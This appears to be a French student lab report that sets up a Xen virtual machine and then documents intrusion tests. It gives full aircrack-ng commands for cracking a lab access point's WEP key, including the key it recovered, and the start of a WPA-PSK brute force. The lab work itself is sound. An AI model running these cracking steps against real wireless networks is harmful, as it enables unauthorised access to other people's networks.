TP sysres IMA5 2021/2022 G6
Sommaire
Création de la machine virtuelle
On veut créer notre machine virtuelle sur l'hyperviseur (HV) capbreton. Afin de pouvoir télécharger l'image Debian, on utilise tout d'abord la commande suivante :
$ export http_proxy=http://proxy.plil.fr:3128
Pour lancer la création de la machine virtuelle, on doit donner le nom de la machine qui sera Bellerose (d'après le thème des noms de bière). Ensuite nous avons l'adresse IP qui nous a été attribuée lors de la répartition des groupes (donc pour nous ce sera 193.48.57.181). On donne aussi l'adresse IP du routeur flottant (193.48.57.190) et le masque du réseau (255.255.255.240 car c'est un /28). On indique également l'emplacement des disques virtuels : /usr/local/xen, le mot de passe pour se connecter à la machine virtuelle : pasglop, et la distribution que nous allons utiliser qui est Debian bullseye.
$ xen-create-image --hostname=Bellerose --ip=193.48.57.181 --gateway=193.48.57.190 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye
On crée ensuite 2 LV de 10 Go (nommés Bellerose1 et Bellerose2) sur le groupe de volume storage.
$ lvcreate -L10G -n Bellerose1 storage $ lvcreate -L10G -n Bellerose2 storage
Puis il faut les formater au format ext4, alors on utilise les commandes suivantes :
$ mkfs.ext4 /dev/storage/Bellerose1 $ mkfs.ext4 /dev/storage/Bellerose2
On modifie notre fichier /etc/xen/Bellerose.cfg pour indiquer à la machine virtuelle qu'elle possède les volumes logiques Bellerose1 et Bellerose2 (on ajoute alors 2 lignes dans la fonction disk) et on ajoute le bridge IMA5sc dans la fonction vif.
$ vim /etc/xen/Bellerose.cfg disk = [ 'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w', 'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w', 'phy:/dev/storage/Bellerose1,xvda3,w', 'phy:/dev/storage/Bellerose2,xvda4,w' ] vif = [ 'ip=193.48.57.181 ,mac=00:16:3E:FA:D0:95 ,bridge=IMA5sc' ]
On peut maintenant lancer notre machine virtuelle :
$ xl create -c /etc/xen/Bellerose.cfg
Avec la commande :
$ cat /etc/fstab
On voit xvda1 et xvda2. On va créer xvda3 et xvda4 pour pouvoir y mettre les répertoires var et home de notre machine virtuelle :
$ mkdir /mnt/xvda3 $ mkdir /mnt/xvda4 $ mount /dev/xvda3 /mnt/xvda3 $ mount /dev/xvda4 /mnt/xvda4
Puis on déplace le répertoire var dans le disque xvda4 :
$ mv /var/* /mnt/xvda4
Pour monter les disques, on ajoute ces lignes dans le fichier /etc/fstab :
# /home vers xvda3 /dev/xvda3 /home ext4 defaults 0 2 # /var vers xvda4 /dev/xvda4 /var ext4 defaults 0 2
On monte le tout à l'aide de la commande :
mount -a
Enfin avec lsblk, on peut voir les deux partitions de notre VM :
$ lsblk xvda3 202:3 0 10G 0 disk /home xvda4 202:4 0 10G 0 disk /var
Enfin, nous activons l'IPv6 sur l'interface en modifiant /etc/network/interfaces
auto eth0 inet6 auto
Pour quitter la VM : CTRL+]
Tests d'intrusion
Exploitation de failles du système
Cassage de clef WEP d’un point d’accès WiFi
On commence par rechercher le nom de notre interface. On utilise alors la commande (en root) :
$ airmon-ng
On trouve l'interface suivante :
wlx40a5ef0127d0
On essaie de démarrer l'interface sur le channel 3 :
$ airmon-ng start wlx40a5ef0127d0 3
Or on remarque que la réponse de la commande nous indique que l'interface a été renommé automatiquement "wlan0mon". On ré-utilise la commande précédente avec le nouveau nom d'interface :
$ airmon-ng start wlan0mon 3
On écoute ensuite tous les paquets dans l'air :
$ airodump-ng wlan0mon
A partir de là, on peut choisir un point d'accès à cracker en utilisant son BSSID (obtenu par la commande précédente). On choisit cracotte06.
$ aireplay-ng -9 -e cracotte06 -a 04:DA:D2:9C:50:55 wlan0mon
On peut récupérer les VI générés par le point d'accès en les stockant dans les fichiers output. On donne le channel 4 puisque le point d'accès est sur ce channel :
$ airodump-ng -c 4 --bssid 04:DA:d2:9C:50:55 -w output wlan0mon
On effectue de fausses authentifications avec la commande aireplay-ng dans un nouveau terminal :
$ aireplay-ng -1 0 -e cracotte06 -a 04:DA:D2:9C:50:55 -h 40:A5:EF:01:0E:5F wlan0mon
L'adresse MAC source donnée après le -h est obtenue lorsque l'on récupère les VI.
Il faut maintenant laisser tourner la commande de récupération des VI assez longtemps pour obtenir assez de données (pour nous içi il a fallu attendre 40000 datas). On peut ensuite décrypter la clef WEP :
$ aircrack-ng -b 04:DA:D2:9C:50:55 output*.cap
On obtient alors :
KEY FOUND ! [ 55:55:55:55:5A:BC:07:CB:A4:44:44:44:44 ] Decrypted correctly: 100%
Cassage de mot de passe WPA-PSK par force brute
$ airmon-ng
$ airmon-ng start wlan0mon 9
$ airodump-ng wlan0mon
kracotte06 :
$ airodump-ng -c 4 --bssid 44:AD:D9:5F:87:05 -w psk wlan0mon
$